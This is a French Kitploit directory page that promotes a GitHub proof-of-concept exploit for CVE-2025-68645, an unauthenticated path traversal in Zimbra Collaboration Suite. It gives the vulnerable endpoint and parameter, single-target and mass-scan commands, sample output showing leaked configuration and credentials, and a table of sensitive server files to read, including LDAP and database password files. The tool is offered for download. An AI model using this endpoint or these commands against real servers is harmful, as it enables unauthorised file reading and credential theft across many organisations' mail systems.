Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/harisaidhin/poc_cve-2025-68645
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Non authentifiée vulnérabilité de lecture de fichier dans Zimbra Collaboration Suite

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Non authentifiée vulnérabilité de lecture de fichier dans Zimbra Collaboration Suite | Kitploit
Partager

CVE-2025-68645 - Vulnérabilité de traversée de chemin dans Zimbra

Security CVE Python License Status

📋 Aperçu

CVE-2025-68645 est une vulnérabilité de traversée de chemin dans Zimbra Collaboration Suite qui permet à des attaquants non authentifiés de lire des fichiers arbitraires du système de fichiers du serveur.

Point d'accès vulnérable

/h/printconversations?javax.servlet.include.servlet_path=

🎯 Impact

ImpactSévérité
Lecture de fichier non authentifiée🔴 Élevée
Divulgation de configuration🔴 Élevée
Fuite d'identifiants🔴 Élevée
Cartographie du réseau interne🟠 Moyenne

📁 Fichiers lisibles

🚀 Utilisation

Scan d'une seule cible

python CVE-2025-68645.py.py -t https://target.zimbra.com

Scan de masse

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

Options avancées

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 Arguments de la ligne de commande

Argument Description Défaut -t, --target URL de la cible unique None -l, --list Fichier contenant la liste des cibles None -o, --output Nom du fichier de sortie results.json --threads Nombre de threads concurrents 10 --timeout Délai d'attente de la requête en secondes 15 -v, --verbose Activer le mode verbeux False --no-verify Désactiver la vérification SSL False --read-all Lire tous les chemins sensibles False

📸 Example Output

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

Télécharger l’outil
CheminInformations exposées
/WEB-INF/web.xmlMappings de servlets, contraintes de sécurité
/WEB-INF/zcs.web.xmlConfiguration spécifique à Zimbra
/opt/zimbra/conf/localconfig.xmlIdentifiants LDAP, mots de passe de base de données
/opt/zimbra/conf/ldap-config.xmlConfiguration du serveur LDAP
/opt/zimbra/conf/attrs/zimbra-attrs.xmlAttributs système
/WEB-INF/classes/logging.propertiesConfiguration de journalisation